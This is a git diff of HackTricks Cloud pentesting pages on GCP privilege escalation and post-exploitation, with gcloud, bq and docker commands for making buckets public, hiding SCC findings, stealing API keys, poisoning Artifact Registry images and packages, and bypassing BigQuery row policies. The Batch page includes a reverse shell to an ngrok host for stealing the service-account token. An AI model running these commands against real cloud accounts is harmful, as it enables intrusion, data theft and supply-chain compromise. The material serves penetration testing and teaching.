+```
+
+### `securitycenter.findings.update`
+
+Update a finding to indicate erroneous information:
+
+```bash
+gcloud scc findings update `myFinding` --organization=123456 --source=5678 --state=INACTIVE
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md
new file mode 100644
index 000000000..38ebcb8ed
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md
@@ -0,0 +1,34 @@
+# GCP - Storage Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud Storage
+
+For more information about CLoud Storage check this page:
+
+{{#ref}}
+../gcp-services/gcp-storage-enum.md
+{{#endref}}
+
+### Give Public Access
+
+It's possible to give external users (logged in GCP or not) access to buckets content. However, by default bucket will have disabled the option to expose publicly a bucket:
+
+```bash
+# Disable public prevention
+gcloud storage buckets update gs://BUCKET_NAME --no-public-access-prevention
+
+# Make all objects in a bucket public
+gcloud storage buckets add-iam-policy-binding gs://BUCKET_NAME --member=allUsers --role=roles/storage.objectViewer
+## I don't think you can make specific objects public just with IAM
+
+# Make a bucket or object public (via ACL)
+gcloud storage buckets update gs://BUCKET_NAME --add-acl-grant=entity=AllUsers,role=READER
+gcloud storage objects update gs://BUCKET_NAME/OBJECT_NAME --add-acl-grant=entity=AllUsers,role=READER
+```
+
+If you try to give **ACLs to a bucket with disabled ACLs** you will find this error: `ERROR: HTTPError 400: Cannot use ACL API to update bucket policy when uniform bucket-level access is enabled. Read more at https://cloud.google.com/storage/docs/uniform-bucket-level-access`
+
+To access open buckets via browser, access the URL `https://.storage.googleapis.com/` or `https://.storage.googleapis.com/`
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md
new file mode 100644
index 000000000..d2f1698bd
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md
@@ -0,0 +1,21 @@
+# GCP - Workflows Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Workflow
+
+Basic information:
+
+{{#ref}}
+../gcp-services/gcp-workflows-enum.md
+{{#endref}}
+
+### Post Exploitation
+
+The post exploitation techniques are actually the same ones as the ones shared in the Workflows Privesc section:
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-workflows-privesc.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md
similarity index 55%
rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md
rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md
index 7e46a20ba..b79f6f274 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md
@@ -1,19 +1,6 @@
 # GCP - Privilege Escalation
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Introduction to GCP Privilege Escalation 
 
@@ -23,25 +10,23 @@ There are certain permissions that will allow a user to **get even more permissi
 
 Therefore, I would like to separate GCP privilege escalation techniques in **2 groups**:
 
-* **Privesc to a principal**: This will allow you to **impersonate another principal**, and therefore act like it with all his permissions. e.g.: Abuse _getAccessToken_ to impersonate a service account.
-* **Privesc on the resource**: This will allow you to **get more permissions over the specific resource**. e.g.: you can abuse _setIamPolicy_ permission over cloudfunctions to allow you to trigger the function.
-  * Note that some **resources permissions will also allow you to attach an arbitrary service account** to the resource. This means that you will be able to launch a resource with a SA, get into the resource, and **steal the SA token**. Therefore, this will allow to escalate to a principal via a resource escalation. This has happened in several resources previously, but now it’s less frequent (but can still happen).
+- **Privesc to a principal**: This will allow you to **impersonate another principal**, and therefore act like it with all his permissions. e.g.: Abuse _getAccessToken_ to impersonate a service account.
+- **Privesc on the resource**: This will allow you to **get more permissions over the specific resource**. e.g.: you can abuse _setIamPolicy_ permission over cloudfunctions to allow you to trigger the function.
+  - Note that some **resources permissions will also allow you to attach an arbitrary service account** to the resource. This means that you will be able to launch a resource with a SA, get into the resource, and **steal the SA token**. Therefore, this will allow to escalate to a principal via a resource escalation. This has happened in several resources previously, but now it’s less frequent (but can still happen).
 
 Obviously, the most interesting privilege escalation techniques are the ones of the **second group** because it will allow you to **get more privileges outside of the resources you already have** some privileges over. However, note that **escalating in resources** may give you also access to **sensitive information** or even to **other principals** (maybe via reading a secret that contains a token of a SA).
 
-{% hint style="warning" %}
-It's important to note also that in **GCP Service Accounts are both principals and permissions**, so escalating privileges in a SA will allow you to impersonate it also.
-{% endhint %}
+> [!WARNING]
+> It's important to note also that in **GCP Service Accounts are both principals and permissions**, so escalating privileges in a SA will allow you to impersonate it also.
 
-{% hint style="info" %}
-The permissions between parenthesis indicate the permissions needed to exploit the vulnerability with `gcloud`. Those might not be needed if exploiting it through the API.
-{% endhint %}
+> [!NOTE]
+> The permissions between parenthesis indicate the permissions needed to exploit the vulnerability with `gcloud`. Those might not be needed if exploiting it through the API.
 
 ## Permissions for Privilege Escalation Methodology
 
 This is how I **test for specific permissions** to perform specific actions inside GCP.
 
-1. Download the github repo [https://github.com/carlospolop/gcp\_privesc\_scripts](https://github.com/carlospolop/gcp_privesc_scripts)
+1. Download the github repo [https://github.com/carlospolop/gcp_privesc_scripts](https://github.com/carlospolop/gcp_privesc_scripts)
 2. Add in tests/ the new script
 
 ## Bypassing access scopes 
@@ -67,9 +52,8 @@ done
 
 The way to escalate your privileges in AWS is to have enough permissions to be able to, somehow, access other service account/users/groups privileges. Chaining escalations until you have admin access over the organization.
 
-{% hint style="warning" %}
-GCP has **hundreds** (if not thousands) of **permissions** that an entity can be granted. In this book you can find **all the permissions that I know** that you can abuse to **escalate privileges**, but if you **know some path** not mentioned here, **please share it**.
-{% endhint %}
+> [!WARNING]
+> GCP has **hundreds** (if not thousands) of **permissions** that an entity can be granted. In this book you can find **all the permissions that I know** that you can abuse to **escalate privileges**, but if you **know some path** not mentioned here, **please share it**.
 
 **The subpages of this section are ordered by services. You can find on each service different ways to escalate privileges on the services.**
 
@@ -77,27 +61,14 @@ GCP has **hundreds** (if not thousands) of **permissions** that an entity can be
 
 If you are inside a machine in GCP you might be able to abuse permissions to escalate privileges even locally:
 
-{% content-ref url="gcp-local-privilege-escalation-ssh-pivoting.md" %}
-[gcp-local-privilege-escalation-ssh-pivoting.md](gcp-local-privilege-escalation-ssh-pivoting.md)
-{% endcontent-ref %}
+{{#ref}}
+gcp-local-privilege-escalation-ssh-pivoting.md
+{{#endref}}
 
 ## References
 
-* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
-* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner)
-* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
+- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
+- [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner)
+- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md
new file mode 100644
index 000000000..810589dcf
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md
@@ -0,0 +1,78 @@
+# GCP - Apikeys Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Apikeys
+
+The following permissions are useful to create and steal API keys, not this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._
+
+Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges.
+
+For more information about API Keys check:
+
+{{#ref}}
+../gcp-services/gcp-api-keys-enum.md
+{{#endref}}
+
+For other ways to create API keys check:
+
+{{#ref}}
+gcp-serviceusage-privesc.md
+{{#endref}}
+
+### Brute Force API Key access 
+
+As you might not know which APIs are enabled in the project or the restrictions applied to the API key you found, it would be interesting to run the tool [**https://github.com/ozguralp/gmapsapiscanner**](https://github.com/ozguralp/gmapsapiscanner) and check **what you can access with the API key.**
+
+### `apikeys.keys.create` 
+
+This permission allows to **create an API key**:
+
+```bash
+gcloud services api-keys create
+Operation [operations/akmf.p7-[...]9] complete. Result: {
+    "@type":"type.googleapis.com/google.api.apikeys.v2.Key",
+    "createTime":"2022-01-26T12:23:06.281029Z",
+    "etag":"W/\"HOhA[...]==\"",
+    "keyString":"AIzaSy[...]oU",
+    "name":"projects/5[...]6/locations/global/keys/f707[...]e8",
+    "uid":"f707[...]e8",
+    "updateTime":"2022-01-26T12:23:06.378442Z"
+}
+```
+
+You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/b-apikeys.keys.create.sh).
+
+> [!CAUTION]
+> Note that by default users have permissions to create new projects adn they are granted Owner role over the new project. So a user could c**reate a project and an API key inside this project**.
+
+### `apikeys.keys.getKeyString` , `apikeys.keys.list` 
+
+These permissions allows **list and get all the apiKeys and get the Key**:
+
+```bash
+for  key  in  $(gcloud services api-keys list --uri); do
+	gcloud services api-keys get-key-string "$key"
+done
+```
+
+You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/c-apikeys.keys.getKeyString.sh).
+
+### `apikeys.keys.undelete` , `apikeys.keys.list` 
+
+These permissions allow you to **list and regenerate deleted api keys**. The **API key is given in the output** after the **undelete** is done:
+
+```bash
+gcloud services api-keys list --show-deleted
+gcloud services api-keys undelete 
+```
+
+### Create Internal OAuth Application to phish other workers
+
+Check the following page to learn how to do this, although this action belongs to the service **`clientauthconfig`** [according to the docs](https://cloud.google.com/iap/docs/programmatic-oauth-clients#before-you-begin):
+
+{{#ref}}
+../../workspace-security/gws-google-platforms-phishing/
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md
similarity index 64%
rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md
rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md
index b9ced0feb..38c219102 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md
@@ -1,27 +1,14 @@
 # GCP - AppEngine Privesc
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## App Engine
 
 For more information about App Engine check:
 
-{% content-ref url="../gcp-services/gcp-app-engine-enum.md" %}
-[gcp-app-engine-enum.md](../gcp-services/gcp-app-engine-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-services/gcp-app-engine-enum.md
+{{#endref}}
 
 ### `appengine.applications.get`, `appengine.instances.get`, `appengine.instances.list`, `appengine.operations.get`, `appengine.operations.list`, `appengine.services.get`, `appengine.services.list`, `appengine.versions.create`, `appengine.versions.get`, `appengine.versions.list`, `cloudbuild.builds.get`,`iam.serviceAccounts.actAs`, `resourcemanager.projects.get`, `storage.objects.create`, `storage.objects.list`
 
@@ -39,9 +26,8 @@ gcloud app deploy #Upload and start application inside the folder
 
 Give it at least 10-15min, if it doesn't work call **deploy another of times** and wait some minutes.
 
-{% hint style="info" %}
-It's **possible to indicate the Service Account to use** but by default, the App Engine default SA is used.
-{% endhint %}
+> [!NOTE]
+> It's **possible to indicate the Service Account to use** but by default, the App Engine default SA is used.
 
 The URL of the application is something like `https://.oa.r.appspot.com/` or `https://-dot-.oa.r.appspot.com`
 
@@ -56,7 +42,7 @@ gsutil ls
 # Download code
 mkdir /tmp/appengine2
 cd /tmp/appengine2
-## In this case it was found in this custom bucket but you could also use the 
+## In this case it was found in this custom bucket but you could also use the
 ## buckets generated when the App Engine is created
 gsutil cp gs://appengine-lab-1-gcp-labs-4t04m0i6-3a97003354979ef6/labs_appengine_1_premissions_privesc.zip .
 unzip labs_appengine_1_premissions_privesc.zip
@@ -98,11 +84,9 @@ gcloud app instances ssh --service  --version  
 
 I think this just change the background SA google will use to setup the applications, so I don't think you can abuse this to steal the service account.
 
-{% code overflow="wrap" %}
 ```bash
 gcloud app update --service-account=
 ```
-{% endcode %}
 
 ### `appengine.versions.getFileContents`, `appengine.versions.update`
 
@@ -116,26 +100,13 @@ However, with read & write access over this bucket, it's possible to escalate pr
 
 For more information and a **PoC check the relevant information from this page**:
 
-{% content-ref url="gcp-storage-privesc.md" %}
-[gcp-storage-privesc.md](gcp-storage-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+gcp-storage-privesc.md
+{{#endref}}
 
 ### Write Access over the Artifact Registry
 
 Even though App Engine creates docker images inside Artifact Registry. It was tested that **even if you modify the image inside this service** and removes the App Engine instance (so a new one is deployed) the **code executed doesn't change**.\
 It might be possible that performing a **Race Condition attack like with the buckets it might be possible to overwrite the executed code**, but this wasn't tested.
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md
new file mode 100644
index 000000000..36c973132
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md
@@ -0,0 +1,173 @@
+# GCP - Artifact Registry Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Artifact Registry
+
+For more information about Artifact Registry check:
+
+{{#ref}}
+../gcp-services/gcp-artifact-registry-enum.md
+{{#endref}}
+
+### artifactregistry.repositories.uploadArtifacts
+
+With this permission an attacker could upload new versions of the artifacts with malicious code like Docker images:
+
+```bash
+# Configure docker to use gcloud to authenticate with Artifact Registry
+gcloud auth configure-docker -docker.pkg.dev
+
+# tag the image to upload it
+docker tag : -docker.pkg.dev///:
+
+# Upload it
+docker push -docker.pkg.dev///:
+```
+
+> [!CAUTION]
+> It was checked that it's **possible to upload a new malicious docker** image with the same name and tag as the one already present, so the **old one will lose the tag** and next time that image with that tag is **downloaded the malicious one** will be downloaded.
+
+

+
+Upload a Python library
+
+**Start by creating the library to upload** (if you can download the latest version from the registry you can avoid this step):
+
+1.  **Set up your project structure**:
+
+    - Create a new directory for your library, e.g., `hello_world_library`.
+    - Inside this directory, create another directory with your package name, e.g., `hello_world`.
+    - Inside your package directory, create an `__init__.py` file. This file can be empty or can contain initializations for your package.
+
+    ```bash
+    mkdir hello_world_library
+    cd hello_world_library
+    mkdir hello_world
+    touch hello_world/__init__.py
+    ```
+
+2.  **Write your library code**:
+
+    - Inside the `hello_world` directory, create a new Python file for your module, e.g., `greet.py`.
+    - Write your "Hello, World!" function:
+
+    ```python
+    # hello_world/greet.py
+    def say_hello():
+        return "Hello, World!"
+    ```
+
+3.  **Create a `setup.py` file**:
+
+    - In the root of your `hello_world_library` directory, create a `setup.py` file.
+    - This file contains metadata about your library and tells Python how to install it.
+
+    ```python
+    # setup.py
+    from setuptools import setup, find_packages
+
+    setup(
+        name='hello_world',
+        version='0.1',
+        packages=find_packages(),
+        install_requires=[
+            # Any dependencies your library needs
+        ],
+    )
+    ```
+
+**Now, lets upload the library:**
+
+1.  **Build your package**:
+
+    - From the root of your `hello_world_library` directory, run:
+
+    ```sh
+    python3 setup.py sdist bdist_wheel
+    ```
+
+2.  **Configure authentication for twine** (used to upload your package):
+    - Ensure you have `twine` installed (`pip install twine`).
+    - Use `gcloud` to configure credentials:
+
+````
+```sh
+twine upload --username 'oauth2accesstoken' --password "$(gcloud auth print-access-token)" --repository-url https://-python.pkg.dev/// dist/*
+```
+````
+
+3. **Clean the build**
+
+```bash
+rm -rf dist build hello_world.egg-info
+```
+
+

+
+> [!CAUTION]
+> It's not possible to upload a python library with the same version as the one already present, but it's possible to upload **greater versions** (or add an extra **`.0` at the end** of the version if that works -not in python though-), or to **delete the last version an upload a new one with** (needed `artifactregistry.versions.delete)`**:**
+>
+> ```sh
+> gcloud artifacts versions delete  --repository= --location= --package=
+> ```
+
+### `artifactregistry.repositories.downloadArtifacts`
+
+With this permission you can **download artifacts** and search for **sensitive information** and **vulnerabilities**.
+
+Download a **Docker** image:
+
+```sh
+# Configure docker to use gcloud to authenticate with Artifact Registry
+gcloud auth configure-docker -docker.pkg.dev
+
+# Dowload image
+docker pull -docker.pkg.dev///:
+```
+
+Download a **python** library:
+
+```bash
+pip install  --index-url "https://oauth2accesstoken:$(gcloud auth print-access-token)@-python.pkg.dev///simple/" --trusted-host -python.pkg.dev --no-cache-dir
+```
+
+- What happens if a remote and a standard registries are mixed in a virtual one and a package exists in both? Check this page:
+
+{{#ref}}
+../gcp-persistence/gcp-artifact-registry-persistence.md
+{{#endref}}
+
+### `artifactregistry.tags.delete`, `artifactregistry.versions.delete`, `artifactregistry.packages.delete`, (`artifactregistry.repositories.get`, `artifactregistry.tags.get`, `artifactregistry.tags.list`)
+
+Delete artifacts from the registry, like docker images:
+
+```bash
+# Delete a docker image
+gcloud artifacts docker images delete -docker.pkg.dev///:
+```
+
+### `artifactregistry.repositories.delete`
+
+Detele a full repository (even if it has content):
+
+```
+gcloud artifacts repositories delete  --location=
+```
+
+### `artifactregistry.repositories.setIamPolicy`
+
+An attacker with this permission could give himself permissions to perform some of the previously mentioned repository attacks.
+
+### Pivoting to other Services through Artifact Registry Read & Write
+
+- **Cloud Functions**
+
+When a Cloud Function is created a new docker image is pushed to the Artifact Registry of the project. I tried to modify the image with a new one, and even delete the current image (and the `cache` image) and nothing changed, the cloud function continue working. Therefore, maybe it **might be possible to abuse a Race Condition attack** like with the bucket to change the docker container that will be run but **just modifying the stored image isn't possible to compromise the Cloud Function**.
+
+- **App Engine**
+
+Even though App Engine creates docker images inside Artifact Registry. It was tested that **even if you modify the image inside this service** and removes the App Engine instance (so a new one is deployed) the **code executed doesn't change**.\
+It might be possible that performing a **Race Condition attack like with the buckets it might be possible to overwrite the executed code**, but this wasn't tested.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md
new file mode 100644
index 000000000..b8839f01d
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md
@@ -0,0 +1,58 @@
+# GCP - Batch Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Batch
+
+Basic information:
+
+{{#ref}}
+../gcp-services/gcp-batch-enum.md
+{{#endref}}
+
+### `batch.jobs.create`, `iam.serviceAccounts.actAs`
+
+It's possible to create a batch job, get a reverse shell and exfiltrate the metadata token of the SA (compute SA by default).
+
+```bash
+gcloud beta batch jobs submit job-lxo3b2ub --location us-east1 --config - <& /dev/tcp/8.tcp.ngrok.io/10396 0>&1'\n"
+            }
+          }
+        ],
+        "volumes": []
+      }
+    }
+  ],
+  "allocationPolicy": {
+    "instances": [
+      {
+        "policy": {
+          "provisioningModel": "STANDARD",
+          "machineType": "e2-micro"
+        }
+      }
+    ]
+  },
+  "logsPolicy": {
+    "destination": "CLOUD_LOGGING"
+  }
+}
+EOD
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md
similarity index 58%
rename from pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md
rename to src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md
index 9e71e3856..08f89c1d1 100644
--- a/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md
@@ -1,27 +1,14 @@
 # GCP - BigQuery Privesc
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## BigQuery
 
 For more information about BigQuery check:
 
-{% content-ref url="../gcp-services/gcp-bigquery-enum.md" %}
-[gcp-bigquery-enum.md](../gcp-services/gcp-bigquery-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-services/gcp-bigquery-enum.md
+{{#endref}}
 
 ### Read Table
 
@@ -38,14 +25,13 @@ This is another way to access the data. **Export it to a cloud storage bucket**
 To perform this action the following permissions are needed: **`bigquery.tables.export`**, **`bigquery.jobs.create`** and **`storage.objects.create`**.
 
 ```bash
-bq extract . "gs:///table*.csv" 
+bq extract .
 "gs:///table*.csv"
 ```
 
 ### Insert data
 
 It might be possible to **introduce certain trusted data** in a Bigquery table to abuse a **vulnerability in some other place.** This can be easily done with the permissions **`bigquery.tables.get`** , **`bigquery.tables.updateData`** and **`bigquery.jobs.create`**:
 
-{% code overflow="wrap" %}
 ```bash
 # Via query
 bq query --nouse_legacy_sql 'INSERT INTO `..` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'
@@ -53,7 +39,6 @@ bq query --nouse_legacy_sql 'INSERT INTO `..` (rank,
 # Via insert param
 bq insert dataset.table /tmp/mydata.json
 ```
-{% endcode %}
 
 ### `bigquery.datasets.setIamPolicy`
 
@@ -101,17 +86,15 @@ bq add-iam-policy-binding \
 According to the docs, with the mention permissions it's possible to **update a row policy.**\
 However, **using the cli `bq`** you need some more: **`bigquery.rowAccessPolicies.create`**, **`bigquery.tables.get`**.
 
-{% code overflow="wrap" %}
 ```bash
 bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY  ON `..` GRANT TO ("") FILTER USING (term = "Cfba");' # A example filter was used
 ```
-{% endcode %}
 
 It's possible to find the filter ID in the output of the row policies enumeration. Example:
 
 ```bash
  bq ls --row_access_policies :.

- 
+
       Id        Filter Predicate            Grantees              Creation Time    Last Modified Time
  ------------- ------------------ ----------------------------- ----------------- --------------------
   apac_filter   term = "Cfba"      user:asd@hacktricks.xyz   21 Jan 23:32:09   21 Jan 23:32:09
@@ -119,7 +102,6 @@ It's possible to find the filter ID in the output of the row policies enumeratio
 
 If you have **`bigquery.rowAccessPolicies.delete`** instead of `bigquery.rowAccessPolicies.update` you could also just delete the policy:
 
-{% code overflow="wrap" %}
 ```bash
 # Remove one
 bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY  ON `..`;'
@@ -127,23 +109,8 @@ bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY  ON `.<
 # Remove all (if it's the last row policy you need to use this
 bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `..`;'
 ```
-{% endcode %}
 
-{% hint style="danger" %}
-Another potential option to bypass row access policies would be to just change the value of the restricted data. If you can only see when `term` is `Cfba`, just modify all the records of the table to have `term = "Cfba"`. However this is prevented by bigquery.
-{% endhint %}
+> [!CAUTION]
+> Another potential option to bypass row access policies would be to just change the value of the restricted data. If you can only see when `term` is `Cfba`, just modify all the records of the table to have `term = "Cfba"`. However this is prevented by bigquery.
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md
new file mode 100644
index 000000000..a79e4c231
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md
@@ -0,0 +1,26 @@
+# GCP - ClientAuthConfig Privesc
+
